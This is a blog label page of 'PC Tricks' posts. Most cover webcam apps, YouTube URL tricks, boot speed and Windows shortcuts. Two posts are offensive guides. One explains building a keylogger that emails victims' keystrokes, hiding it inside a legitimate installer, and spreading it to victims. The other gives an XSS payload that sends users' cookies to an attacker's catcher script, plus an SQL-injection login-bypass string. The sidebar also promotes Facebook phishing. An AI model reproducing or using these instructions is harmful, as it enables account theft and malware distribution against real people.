Online Help
Showing posts with label PC Tricks. Show all posts
Showing posts with label PC Tricks. Show all posts

Use Your Android Phone As A Wireless Web Camera

Posted by asish p in: Android Tricks PC Tricks
If You Are Using The Android Based Mobile Phone Then You Have Chosen The Right Mobile Software Platform. You Are Not Lacking Anything At All! While Moving Around The Google Play, We Found An Interesting And Free Android App Which Could Help Anyone Having Android Phone, With Camera Sure, As It Can Make Your Mobile Phone Work As Webcam For Pc Supporting Wi-Fi And Usb Mode.









IP Webcam



Yes, IP Webcam Is A Free App Available On Google Play. This App Turn Your Mobile Phone Into A Wireless Webcam. Ip Webcam Supports Windows,Linux And Mac Os Platform. Ip Webcam Turns Your Phone Into A Network Camera With Multiple Viewing Options. View Your Camera On Any Platform With Vlc Player Or Web Browser. Stream Video Inside Wifi Network Without Internet Access.Currently Ip Webcam Doesn’t Supports Usb Connection, It Supports Wi-Fi Or Mobile Internet Connection. You Can Use Either Front Or Rear Camera.








Download From Below


Download
Click here



Here Is The Guide On How To Use Ip Webcam:



1. First You Have To Download Ip Webcam From The Link Provided Above For Free
2.Then  Install App In Your Mobile And Grant It Required Permissions
3. Open The App And Setup It Correctly
4. Now Select Connect With Pc And Choose Either Wi-Fi Or Mobile Internet
5. To Watch Live Stream Enter The Ip Address Provided In The App In Any Web Browser Or Vlc Media Player
6. Drivers Of It Will Be Installed Automatically



Enjoy!! 


How To Unblock Youtube To Watch Age-Restricted Videos (2 Methods)

Posted by asish p in: Android Tricks PC Tricks
                          Sometimes a music video or a tutorial video on YouTube will have some sort of age restriction warning on it that will prevent you from watching it if you are not logged in.We are not here to show you how to break the rules but we want to show you how to watch these videos as sometimes there is an error as to why a video has been blocked. Sometimes a YouTube user will be jealous or angry that another user has a better video or some other strange reason and they will “flag” the other persons video to make people have to sign in to view it to make the other person get fewer views. Sometimes even a normal innocent ASMR video will get flagged because the way the person is doing the ASMR video sounds too sexual at times. Either way we will show you how to get around this. For those video watchers who do not want to or cannot login for whatever reason in order to view what might be inappropriate material on YouTube, here is the very simple bypass method….





Trick -1 to Unblock Youtube Age-Restricted Videos Using URL Change

 First of all, Locate the videos on Youtube which is restricted according to age.
 After that  you will see the age restriction for bypassing that just copy the URL of the video as shown in picture .

 In the URL, you will have to replace watch?v= with  /v/
Like the actual URL is https://www.youtube.com/watch?v=6LZM3_wp2ps
you will change it to https://www.youtube.com/v/6LZM3_wp2ps
That’s it, paste the URL and press enter and you are done. Enjoy



Trick -2 to Unblock Youtube Age-Restricted Videos Using Redirected Site

 First of all, Locate the videos on Youtube which is restricted according to age.
 Now just put nsfw before Youtube in URL, 
Like the actual URL is https://www.youtube.com/watch?v=6LZM3_wp2ps
you will change it to https://www.nsfwyoutube.com/watch?v=6LZM3_wp2ps

Hit enter, and you are done! The video will start playing without signing in any Youtube account.

Video Tutorial

Enjoy Guys....

Friends, If You Like The Post Kindly Comment Below The Post And Do Share Your Response, Thanks For Reading.. 👍 👲

How Hackers Can use Keyloggers To Hack Accounts

Posted by asish p in: PC Security PC Tricks
Accounts password hacking with keylogger guide for securing. Keyloggers is the best software to hack the accounts of victims that through recording their device when they will login to their accounts .This software is hidden so that your victim cannot judge it and it also simultaneously works so as to hack the passwords that are recorded and saved in your local storage location.Here in this article you will learn how most hackers use Keyloggers to hack up the accounts succesfully and you will also how you can also do like them.Just follow up the steps given below to know how to do it.



1.Creating server:

First of all you has to create up the keylogger server that will run on the machine of the victim and will capture the keystrokes and mail us on the email account that will be used to build the keylogger.To build up the keylogger server you has to follow the given steps:
a) Download the keylogger and good binder from google.
b) Open the keylogger file and here the Gmail ID and password will be required.
c) Click on the server settings in the keylogger and then enter the time after which you want the report.After that choose the output location and give it any name.
d) After that click on the log and Result settings and then in Log Email Title enter the subject of email also click the last two options i.e add computer name and add victim name.
e) Tap on other options like unclick the message button because on binding it will not show any warning messages.Now click on build keyloggers and after that you will see your keyloggers file at the location that you has given previously.
f) Now your Keylogger server is ready for hacking accounts.

2.Extracting the Icon File from any installer(resourse hacker):

a) Open the resourse hacker folder and then open the reshacker file and then go to its menu and open any setup file.
b) Click on the action button in the menu and then click save all resourses button.This will save all your resourses to desktop or any other location of your choise.It will consist of two files one is icon file and the other one is res file.The Icon file will be required for other steps.
c) Now we have got the Icon of the installer file that will be used further in other steps.

3.Binding the Keylogger server:

a) Go to the keylogger folder and then open the binder and then click on the + button given below to add files.
b) Add the keyloggers server there and the set up of the software.After that Go to settings in the menu of binder.Select the icon that we have generated in the previous step and then set the location of the output file.
c) Again go to the File menu in binder and then click on bind files.
d) Here your Binded Keylogger is ready.The only thing that you has to do now is to spread it to the victims or users that are your friend.

The Keyloggers setup that you will send through various posts or forumns to your victims and after being installed it will send you the anonomous data of their keystrokes that will also contain their logins to the accounts from which you can now find their usernames and the corresponding passwords.

Friends, If You Like The Post Kindly Comment Below The Post And Do Share Your Response, Thanks For Reading.. 👍 👲

Best Possible Ways That Hackers Used To Hack Websites

Posted by asish p in: PC Tricks

Method 1: Using Cross Site Scripting

Step 1:First step to be followed i to find a vulnerable site where yo can post your text. if the site is secure then this will not work.window.alert(“test”)window.alert(“test”)window.alert(“test”)
Step 2:Now create a post and write some special code into the “post” which will capture the data of all who click on it. Test the system if it filters out code. Post
<script>window.alert(“test”)</script>
If an alert box appears in front of you then the site is vulnerable to attack.
Step 3: Create and upload your cookie catcher.
The main idea to create this is to capture a user’s cookie which helps in accessing to their account for websites with vulnerable logins. For this, you need a cookie catcher which will capture your target’s cookies and divert them. Upload the catcher to a website you have accessed to and that supports php too.
Step 4:Post with your cookie catcher.
Input the code into the post which will capture the cookies and sent them to your site too. You wishe to put in some text after the code to reduce suspicion and keep it away from deleting.
An example code would look like
<iframe frameborder=”0″ height=”0″ width=”0″ src=”javascript…:void(document.location=’YOURURL/cookiecatcher.php?c=’ document.cookie)></iframe>

Method 2: Executing Injection Attacks

Step 1: You need to find a vulnerable site due to an easily accessible admin login.Try searching it.
Step 2:Now, Login as an admin. Type admin as the username and use one of a number of different strings as the password. Take a example: 1’or’1’=’1.It will take few seconds.
Step 3: Access the website. You will be able to find a string that allows you admin access to a website assuming the site is vulnerable to attack.

Method 3: Setting Up For Success

Step 1:If you really want to learn how to hack websites you must know one or two languages like Python or SQL and how computers and technologies work for the better control of computers and to find vulnerabilities in system.
Step 2:You must be familiar about HTML literacy and Java Script to hack websites in particular.
Step 3: You must consult with whitehats. These are the hackers who use their powers for good, exposing security vulnerabilities. If you want to hack websites and protect your own site, must contact with the whitehats.
Step 4: Research hacking. To protect your own site or to learn hacking, you must be trained in field of researching. There are many was and list keeps on changing.
Sep 5: Keep up to date. As the list keeps on changing , you must be sure that you are up to date. If you are protected from certain types of hack then only you are safe in future.

Method 4: ClickJacking Attacks

ClickJacking is also called a UI Redress Attack . It is this when a hacker uses multiple opaque layers to trick a user into clicking the top layer without knowing them.  The attacker is “hijacking” that is not meant for the actual page loaded but for a page where the attacker wants you to be. Let us take an example i.e using a carefully crafted combinations of stylesheets,iframes and text boxes. By this a user can led to believe they are typing in the password for bank account but they are writing into an invisible space that is controlled by the attacker which is not visible to the user.

Method 5: SYMLINKING

A symlink is a special file that “points to” a hard link on a mounted file system. A symlinking attack occurs when a hacker places the symlink in such a way that the user access the endpoint thinks they are accessing the correct file.
If the endpoint file is an output, the consequence of the symlink attack is that it can be easily modified alternatively of the file at the deliberate location. Modifications include like appending, overwriting,corrupting or even changing permissions.
In various situations, hacker may be able to control the changes to a file, grant themselves approach access, insert wrong information, reveal sensitive information or destroy vital system or files or applications. And therefore better is to secure your websites.


Note:-  Article is only for knowledge and research purpose, do not use it in any illegal way, i am not responsible for anything happen.

Friends, If You Like The Post Kindly Comment Below The Post And Do Share Your Response, Thanks For Reading.. 👍 👲

[ Exclusive ] All Youtube Tricks At One Place - Gif Formation , Keyboard Shortcuts , Funny Tricks Etc

Posted by asish p in: PC Tricks


As you are reading this, over 3 million YouTube videos are already watched, by the people around the world. YouTube is second most popular Search engine after Google. But instead of just streaming those funny cat videos there is much more you can do on YouTube. (See the following tutorial)


1. How can I download videos from YouTube


YouTube don’t allow its users to download videos however there already tons of programs and online websites that can do it for you. But why do we bother about those bulky programs when we can easily dot that with this simple url trick, by Replacing youtube with ssyoutube in the video url.

Video URL - https://www.youtube.com/watch?v=rSXaBIE9zLM

Final URL - https://www.ssyoutube.com/watch?v=rSXaBIE9zLM


2. How to make a gif from a YouTube video

Video URL - https://www.youtube.com/watch?v=rSXaBIE9zLM
Trick - Replace "youtube" with "gifyoutube" in the URL to convert video into gif format .


Final URL - https://www.gifyoutube.com/watch?v=rSXaBIE9zLM


3.How to watch age restricted videos

Video URL - https://www.youtube.com/watch?v=rSXaBIE9zLM
Trick - Replace "youtube" with "nsfwyoutube" to bypass age restriction.



Final URL - https://www.nsfwyoutube.com/watch?v=rSXaBIE9zLM

 4.How To Disable Of Videos In Youtube

Trick - Just go on the top right of the page, and slide the auto play button. It should turn from blue to grey once you slide it.


5.Download The Video In  Any Quality Available

Video URL - https://www.youtube.com/watch?v=rSXaBIE9zLM

Trick - Replace "youtube" with "ssyoutube" in the URL to download the video in any quality available.




Final URL - https://www.ssyoutube.com/watch?v=rSXaBIE9zLM 

6.Start Your Video At A Specific Time

Video URL - https://www.youtube.com/watch?v=rSXaBIE9zLM
Trick - Just add "#t=" followed by the time you want your video to start from. For example, "#t=1m2s" or "#t=62s".


Final URL - https://www.youtube.com/watch?v=rSXaBIE9zLM#t=62s 

7. All Shorcuts And Hack Tricks

📌 Replace that url youtube With ssyoutube For download the video in any format...

📍 Replace that Url YouTube with yout and download the video in mp3 format..

📌 Replace that Url YouTube with nsfyoutube To bypass The age Restriction on the video....

📍 Replace that Url YouTube with youtubeskip To bypass the ads on the video...

📌 Replace that Url YouTube with listenonrepeat To Repeat that video again and again..

📍 Replace that Url YouTube with gifyoutube To download video in .gif format 

📌 Replace that Url YouTube with listentoyoutube To Download the Audio of a video...

All YouTube Keyboard Shortcuts

k= Pause/play.
j= Rewind the video 10 seconds.
l= Fast forward the video 10 seconds.
m= Mute the video.

Number 0 = go to the beginning of the video
Numbers 1 to 9 = jump to 10% to 90% of the video

Friends, If You Like The Post Kindly Comment Below The Post And Do Share Your Response, Thanks For Reading.. 👍 👲

Trick to Boot Or Start Computer Faster

Posted by asish p in: PC Security PC Tricks


One… two… three… how many minutes does it take your computer to start up? Hopefully not more than three, but it wouldn’t surprise me if you said it surpassed that time. The thing is, our computers have a lot to do when starting up and I think it’s something we often forget about and take for granted. That said, how can we blame our computers when we’re bogging it down with a bunch of junk?



It may not even be junk – it may just be great programs, but just starting up when they don’t need to. Let’s take a look at some useful programs you can use and some things you can do to minimize your start time and get on with your tasks.




Trick to Boot Or Start Computer Faster

Trick – 1

  • Press start button and type msconfig and press enter.
  • Or go to
    Start > Run > type msconfig
    press enter .
  • Go to the startup tab. In this tab you will see a list of programs which run on starting windows . These are all the programs that automatically start when you boot your PC. It is these that slow down the boot up process.
  • Unchecked all the unwanted items like ms-office, messengers other utilities that you may not need at startup). 
  • Don’t uncheck your antivirus software. 🙂
  • Restart your Pc to and see for yourself, your pc will now boot faster.

Trick to Boot Or Start Computer Faster

Trick – 2

A great new feature in Microsoft Windows XP is the ability to do a boot defragment. This places all boot files next to each other on the disk to allow for faster booting. By default this option is enabled, but on some systems it is not, so below is the information on how to turn it on:
  • Go to Start Menu and Click Run
  • Type in regedit then click ok
  • Find
    “HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Dfrg/Boot/Optimize/Function“
  • Select “Enable” from the list on the right
  • Right on it and select “Modify“
  • Change the value to Y .
  • Reboot your Pc and see the change yourself.

Trick to Boot Or Start Computer Faster

Trick – 3

SPEED UP BOOT BY DISABLING UNUSED PORTS.!!
You may have tried many tweaks like modifying windows XP start-up applications, prefetches, unload DLLs method, etc. And yes those methods do work for me.

I have just accidentally found out another way to give you an extra boost in windows XP’s boot performance. This is done by disabling your unused devices in Device Manager. for example, if you don’t have input devices that are connected to one of your USB’s or COM ports, disabling them will give you an extra performance boost in booting. 



  • Go to
    Control Panel -> System -> Hardware tab -> Device manager 
  • Disable devices that you don’t use for your PC and then restart.
Note:-Try on your own risk.




Friends, If You Like The Post Kindly Comment Below The Post And Do Share Your Response, Thanks For Reading.. 👍 👲

All Windows shourtcut keys 2017

Posted by asish p in: PC Tricks

Keyboard shortcuts can boost your productivity if your daily job relies heavily on using Windows. They just don’t get the work done quickly, but also improves the efficiency. Give them a try and you just might find yourself getting addicted to keyboard shortcuts
We’ve compiled a list of keyboard shortcuts for Windows 190 + shortcuts grouped into categories for easy access. If we missed some shortcut in this list, kindly let us know through the comments section.


Here are the shortcuts to get to the shortcuts:

General Shortcuts

Let’s kickstart the list with the most common shortcuts that you’ll often use.
·         F1 [Display Help]
·         F2 [Rename the selected item]
·         F3 [Search for a file or folder]
·         F4 [Display the address bar list in File Explorer]
·         F5 [Refresh the active window]
·         F6 [Cycle through screen elements in a window or on the desktop]
·         F10 [Activate the Menu bar in the active app]
·         ALT + F4 [Close the active item, or exit the active app]
·         ALT + ESC [Cycle through items in the order in which they were opened]
·         ALT + Underlined Letter in menus and dialog box options [Perform the command for that letter]
·         ALT + ENTER [Display properties for the selected item]
·         ALT + SPACEBAR [Open the shortcut menu for the active window]
·         ALT + LEFT ARROW [Back]
·         ALT + RIGHT ARROW [Forward]
·         ALT + PAGE UP [Move up one screen]
·         ALT + PAGE DOWN [Move down one screen]
·         ALT + TAB [Switch between open apps (except desktop apps)]
·         CTRL + F4 [Close the active document (in apps that allow you to have multiple documents open simultaneously)]
·         CTRL + A [Select all items in a document or window]
·         CTRL + C or CTRL + INSERT [Copy the selected item]
·         CTRL + D / DELETE [DELETE the selected item and move it to the Recycle Bin]
·         CTRL + R or F5 [Refresh the active window]
·         CTRL + V or SHIFT + INSERT [Paste the selected item]
·         CTRL + X [Cut the selected item]
·         CTRL + Y [Redo an action]
·         CTRL + Z [Undo an action]
·         CTRL + + or CTRL + – [Zoom in or out of a large NUMBER of items, like apps pinned to the Start screen]
·         CTRL + mouse scroll wheel [Change the size of desktop icons or zoom in or out of a large NUMBER of items, like apps pinned to the Start screen]
·         CTRL + RIGHT ARROW [Move the cursor to the beginning of the next word]
·         CTRL + LEFT ARROW [Move the cursor to the beginning of the previous word]
·         CTRL + DOWN ARROW [Move the cursor to the beginning of the next paragraph]
·         CTRL + UP ARROW [Move the cursor to the beginning of the previous paragraph]
·         CTRL + ALT + TAB [Use the arrow keys to switch between all open apps]
·         CTRL + ARROW + SPACEBAR [Select multiple individual items in a window or on the desktop]
·         CTRL + SHIFT + ARROW [Select a block of text]
·         CTRL + ESC [Open the Start screen]
·         CTRL + SHIFT + ESC [Open Task Manager]
·         CTRL + SHIFT [Switch the keyboard layout when multiple keyboard layouts are available]
·         CTRL + SPACEBAR [Turn the Chinese input method editor (IME) on or off]
·         SHIFT + F10 [Display the shortcut menu for the selected item]
·         SHIFT + ARROW [Select more than one item in a window or on the desktop, or select text within a document]
·         SHIFT + DELETE [Delete the selected item without moving it to the Recycle Bin first]
·         RIGHT ARROW [Open the next menu to the right, or open a submenu]
·         LEFT ARROW [Open the next menu to the left, or close a submenu]
·         ESC [Stop or leave the current task]

Windows key Shortcuts

Let’s check the keyboard shortcuts involving the Windows logo key. Most of them are introduced in Windows 8’s Metro UI, and can be used in Windows 8 and above.
·         Win + F1 [Open Windows Help and support]
·         Win [Display or hide the Start screen]
·         Win + B [Set focus in the notification area]
·         Win + C [Open Charms]
·         Win + D [Display and hide the desktop]
·         Win + E [Open File Explorer]
·         Win + F [Open the Search charm and search for files]
·         Win + H [Open the Share charm]
·         Win + I [Open the Settings charm]
·         Win + K [Open the Devices charm]
·         Win + L [Lock your PC or switch people]
·         Win + M [Minimize all windows]
·         Win + O [Lock device orientation]
·         Win + P [Choose a presentation display mode]
·         Win + Q [Open the Search charm to search everywhere or within the open app (if the app supports app search)]
·         Win + R [Open the Run dialog box]
·         Win + S [Open the Search charm to search Windows and the web]
·         Win + T [Cycle through apps on the taskbar]
·         Win + U [Open Ease of Access Center]
·         Win + V [Cycle through notifications]
·         Win + SHIFT + V [Cycle through notifications in reverse order]
·         Win + W [Open the Search charm and search for settings]
·         Win + X [Open the Quick Link menu]
·         Win + Z [Show the commands available in the app]
·         Win + , [Temporarily peek at the desktop]
·         Win + PAUSE [Display the System Properties dialog box]
·         Win + CTRL + F [Search for PCs (if you’re on a network)]
·         Win + SHIFT + M [Restore minimized windows on the desktop]
·         Win + (NUMBER 1-9) [Open the desktop and start the app pinned to the taskbar in the position indicated by the number. If the app is already running, it switches to that app.]
·         Win + SHIFT + (NUMBER 1-9) [Open the desktop and start a new instance of the app pinned to the taskbar in the position indicated by the number]
·         Win + CTRL + (NUMBER 1-9) [Open the desktop and switch to the last active window of the app pinned to the taskbar in the position indicated by the number]
·         Win + ALT + (NUMBER 1-9) [Open the desktop and open the Jump List for the app pinned to the taskbar in the position indicated by the number]
·         Win + CTRL + SHIFT + (NUMBER 1-9) [Open the desktop and open a new instance of the app located at the given position on the taskbar as an administrator]
·         Win + TAB [Cycle through recently used apps (except desktop apps)]
·         Win + CTRL + TAB [Cycle through recently used apps (except desktop apps)]
·         Win + SHIFT + TAB [Cycle through recently used apps (except desktop apps) in reverse order]
·         Win + CTRL + B [Switch to the app that displayed a message in the notification area]
·         Win + UP ARROW [Maximize the window]
·         Win + DOWN ARROW [Remove current app from screen or minimize the desktop window]
·         Win + LEFT ARROW [Maximize the app or desktop window to the LEFT side of the screen]
·         Win + RIGHT ARROW [Maximize the app or desktop window to the RIGHT side of the screen]
·         Win + HOME [Minimize all but the active desktop window (restores all windows on second stroke)]
·         Win + SHIFT + UP ARROW [Stretch the desktop window to the top and bottom of the screen]
·         Win + SHIFT + DOWN ARROW [Restore/minimize active desktop windows vertically, maintaining width]
·         Win + SHIFT + LEFT ARROW or RIGHT ARROW [Move an app or window in the desktop from one monitor to another]
·         Win + SPACEBAR [Switch input language and keyboard layout]
·         Win + CTRL + SPACEBAR [Change to a previously selected input]
·         Win + ENTER [Open Narrator]
·         Win + SHIFT + . [Cycle through open apps]
·         Win + . [Cycle through open apps]
·         Win + / [Initiate IME reconversion]
·         Win + ALT + ENTER [Open WindowsMedia Center]
·         Win + +/- [Zoom in or out using Magnifier]
·         Win + ESC [Exit Magnifier]

Dialog box Shortcuts

These are the keyboard shortcuts that can be used in dialog boxes.
·         F1 [Display Help]
·         F4 [Display the items in the active list]
·         CTRL + TAB [Move forward through tabs]
·         CTRL + SHIFT + TAB [Move back through tabs]
·         CTRL + (NUMBER 1-9) [Move to nth tab]
·         TAB [Move forward through options]
·         SHIFT + TAB [Move back through options]
·         ALT + Underlined Letter in menus and dialog box options [Perform the command (or select the option) that goes with that letter]
·         SPACEBAR [Select or clear the check box if the active option is a check box]
·         BACKSPACE [Open a folder one level up if a folder is selected in the Save As or Open dialog box]
·         ARROW keys [Select a button if the active option is a group of option buttons]

File explorer Shortcuts

These are the shortcuts that can be used to work with File Explorer’s windows or folders.
·         ALT + D [Select the address bar]
·         CTRL + E [Select the search box]
·         CTRL + F [Select the search box]
·         CTRL + N [Open a new window]
·         CTRL + W [Close the current window]
·         CTRL + mouse scroll wheel [Change the size and appearance of file and folder icons]
·         CTRL + SHIFT + E [Display all folders above the selected folder]
·         CTRL + SHIFT + N [Create a new folder]
·         NUM LOCK + * [Display all subfolders under the selected folder]
·         NUM LOCK + + [Display the contents of the selected folder]
·         NUM LOCK + – [Collapse the selected folder]
·         ALT + P [Display the preview pane]
·         ALT + ENTER [Open the Properties dialog box for the selected item]
·         ALT + RIGHT ARROW [View the next folder]
·         ALT + UP ARROW [View the folder that the folder was in]
·         ALT + LEFT ARROW [View the previous folder]
·         BACKSPACE [View the previous folder]
·         RIGHT ARROW [Display the current selection (if it’s collapsed), or select the first subfolder]
·         LEFT ARROW [Collapse the current selection (if it’s expanded), or select the folder that the folder was in]
·         END [Display the bottom of the active window]
·         HOME [Display the top of the active window]
·         F11 [Maximize or minimize the active window]

Taskbar Shortcuts

Here are the keyboard shortcuts to work with items on the Desktop’s taskbar.
·         SHIFT + Click a Taskbar Button [Open an app or quickly open another instance of an app]
·         CTRL + SHIFT + Click a Taskbar Button [Open an app as an administrator]
·         SHIFT + Right-click a Taskbar Button [Show the window menu for the app]
·         SHIFT + Right-click a Grouped Taskbar Button [Show the window menu for the groUP]
·         CTRL + Click a Grouped Taskbar Button [Cycle through the windows of the groUP]

Ease of access Shortcuts

These are the keyboard shortcuts to help you use your computer easily
·         Hold RIGHT SHIFT for eight seconds [Turn Filter Keys on and off]
·         LEFT ALT + LEFT SHIFT + PRINT SCREEN [Turn High Contrast on or off]
·         LEFT ALT + LEFT SHIFT + NUM LOCK [Turn Mouse Keys on or off]
·         Press SHIFT five times [Turn Sticky Keys on or off]
·         Press NUM LOCK for five seconds [Turn Toggle Keys on or off]
·         Win + U [Open the Ease of Access Center]

Magnifier Shortcuts

Here are the keyboard shortcuts to help you use Magnifier
·         Win + + [Zoom in]
·         Win + – [Zoom out]
·         CTRL + ALT + SPACEBAR [Preview the desktop in full-screen mode]
·         CTRL + ALT + D [Switch to docked mode]
·         CTRL + ALT + F [Switch to full-screen mode]
·         CTRL + ALT + I [Invert colors]
·         CTRL + ALT + L [Switch to lens mode]
·         CTRL + ALT + R [Resize the lens]
·         CTRL + ALT + ARROW keys [Pan in the direction of the ARROW keys]
·         Win + ESC [Exit Magnifier]

Narrator Shortcuts

These are the keyboard shortcuts to help you use Narrator
·         SPACEBAR or ENTER [Activate current item]
·         TAB + ARROW Keys [Move around on the screen]
·         CTRL [Stop reading]
·         CAPS LOCK + D [Read item]
·         CAPS LOCK + M [Start reading]
·         CAPS LOCK + H [Read document]
·         CAPS LOCK + V [Repeat phrase]
·         CAPS LOCK + W [Read window]
·         CAPS LOCK + PAGE UP or PAGE DOWN [Increase or decrease the volume of the voice]
·         CAPS LOCK + +/- [Increase or decrease the speed of the voice]
·         CAPS LOCK + SPACEBAR [Do default action]
·         CAPS LOCK + LEFT or RIGHT ARROW [Move to previous/next item]
·         CAPS LOCK + F2 [Show commands for current item]
·         Caps + ESC [Exit Narrator]

Remote desktop connection Shortcuts

These are the keyboard shortcuts to ease the use of remote desktop connection.
·         ALT + PAGE UP [Move between apps, left to right]
·         ALT + PAGE DOWN [Move between apps, right to left]
·         ALT + INSERT [Cycle through apps in the order that they were started]
·         ALT + HOME [Display the Start screen]
·         CTRL + ALT + BREAK [Switch between a window and full screen]
·         CTRL + ALT + END [Display the Windows Security dialog box]
·         CTRL + ALT + HOME [In full-screen mode, activate the connection bar]
·         ALT + DELETE [Display the system menu]
·         CTRL + ALT + –
[Place a copy of the active window, within the client, on the Terminal server clipboard (similar to 
ALT + PRINT SCREEN on a local PC)]
·         CTRL + ALT + +
[Place a copy of the entire client window area on the Terminal server clipboard (similar to 
Print Screen on a local PC)]
·         CTRL + ALT + RIGHT ARROW 
[
TAB out of the Remote Desktop controls to a control in the host app (for example, a button or a text box). Useful when the Remote Desktop controls are embedded in another (host) app.]
·         CTRL + ALT + LEFT ARROW 
[
TABout of the Remote Desktop controls to a control in the host app (for example, a button or a text box). Useful when the Remote Desktop controls are embedded in another (host) app.]

Help viewer Shortcuts

These are the keyboard shortcuts that can be used with the help viewer.
     F3 [Move the cursor to the search box]
·         F10 [Display the Options menu]
·         HOME [Move to the beginning of a topic]
·         END [Move to the end of a topic]
·         ALT + LEFT ARROW [Move back to the previously viewed topic]
·         ALT + RIGHT ARROW [Move to the next (previously viewed) topic]
·         ALT + HOME [Display the Help and support home page]
·         ALT + A [Display the customer support page]
·         ALT + C [Display the TABle of Contents]
·         ALT + N [Display the Connection Settings menu]
·         CTRL + F [Search the current topic]
·         CTRL + P [Print a topic]

App rearranging Shortcuts (Metro)

Here are the keyboard shortcuts that can be used to rearrange apps on Metro screen. You should keep the Windows key pressed down continuously once you enter in the rearrange mode, then use the various commands. When you’re done rearranging apps, then release the Windows key.
·         Win + . [Enter Rearrange mode and select apps or dividers across monitors]
·         Win + LEFT ARROW [Move app divider left]
·         Win + RIGHT ARROW [Move app divider right]
·         Win + UP ARROW [Maximize app]
·         Win + DOWN ARROW [Close app]
·         Win + ESC [Exit Rearrange mode]



Friends, If You Like The Post Kindly Comment Below The Post And Do Share Your Response, Thanks For Reading.. 👍 👲
Older Posts Home
Powered by Blogger.

Use Your Android Phone As A Wireless Web Camera

asish p 0 Android Tricks, PC Tricks Monday, 27 February 2017
Use Your Android Phone As A Wireless Web Camera Use Your Android Phone As A Wireless Web Camera

If You Are Using The Android Based Mobile Phone Then You Have Chosen The Right Mobile Software Platform. You Are Not Lacking Anything At All...

Read More

How To Unblock Youtube To Watch Age-Restricted Videos (2 Methods)

asish p 0 Android Tricks, PC Tricks Saturday, 25 February 2017
How To Unblock Youtube To Watch Age-Restricted Videos (2 Methods) How To Unblock Youtube To Watch Age-Restricted Videos (2 Methods)

                          Sometimes a music video or a tutorial video on YouTube will have some sort of age restriction warning on it that w...

Read More

How Hackers Can use Keyloggers To Hack Accounts

asish p 0 PC Security, PC Tricks Friday, 2 December 2016
How Hackers Can use Keyloggers To Hack Accounts How Hackers Can use Keyloggers To Hack Accounts

Accounts password hacking with keylogger guide for securing. Keyloggers is the best software to hack the accounts of victims that through re...

Read More

Best Possible Ways That Hackers Used To Hack Websites

asish p 0 PC Tricks
Best Possible Ways That Hackers Used To Hack Websites Best Possible Ways That Hackers Used To Hack Websites

Method 1: Using Cross Site Scripting Step 1:First step to be followed i to find a vulnerable site where yo can post your text. if the site i...

Read More

[ Exclusive ] All Youtube Tricks At One Place - Gif Formation , Keyboard Shortcuts , Funny Tricks Etc

asish p 0 PC Tricks Sunday, 3 July 2016
[ Exclusive ] All Youtube Tricks At One Place - Gif Formation , Keyboard Shortcuts , Funny Tricks Etc [ Exclusive ] All Youtube Tricks At One Place - Gif Formation , Keyboard Shortcuts , Funny Tricks Etc

As you are reading this, over 3 million YouTube videos are already watched, by the people around the world. YouTube is second most popular S...

Read More

Trick to Boot Or Start Computer Faster

asish p 0 PC Security, PC Tricks Saturday, 25 June 2016
Trick to Boot Or Start Computer Faster Trick to Boot Or Start Computer Faster

One… two… three… how many minutes does it take your computer to start up? Hopefully not more than three, but it wouldn’t surprise me if you ...

Read More

All Windows shourtcut keys 2017

asish p 1 PC Tricks
All  Windows shourtcut keys 2017 All Windows shourtcut keys 2017

Keyboard shortcuts can   boost your productivity   if your daily job relies heavily on using Windows. They just don’t get the work done quic...

Read More
Older Posts Home

Categories

Airtel Free Internet Amazon Trick Android Tricks Computer Tricks Customize Deals & Earn Download Trick Facebook Facebook Phishing Fb Tricks free Free Inrernet FreeRecharge Trick Idea Free Net jio Trick PC Security PC Tricks Phone Safety Reliance Free Net Tricks For App Tricks for Earn Tricky Tricks Vodafone Free Net WhatsApp Tricks

Whatsapp Update

Join Us On Whatsapp Send Your Name to +91 7873123457 For Getting Add in Our Broadcast List.

Follow Us

About Me

asish p
View my complete profile

Featured content

About This Blog

Featured Content

Navigation

Blog Archive

  • ▼  2018 (9)
    • ▼  May (1)
      • FACEBOOK PHISHING By X-Shadow - 100% WORKING 2018
    • ►  March (7)
    • ►  February (1)
  • ►  2017 (37)
    • ►  November (6)
    • ►  August (8)
    • ►  June (3)
    • ►  May (2)
    • ►  March (5)
    • ►  February (11)
    • ►  January (2)
  • ►  2016 (131)
    • ►  December (13)
    • ►  October (3)
    • ►  July (3)
    • ►  June (8)
    • ►  May (10)
    • ►  April (17)
    • ►  March (44)
    • ►  February (30)
    • ►  January (3)

"© Copyright 2014" Eleven 40 Blogger · All Rights Reserved · And Our Sitemap · All Logos & Trademark Belongs To Their Respective Owners·
Template Developed By Blogging Recipes.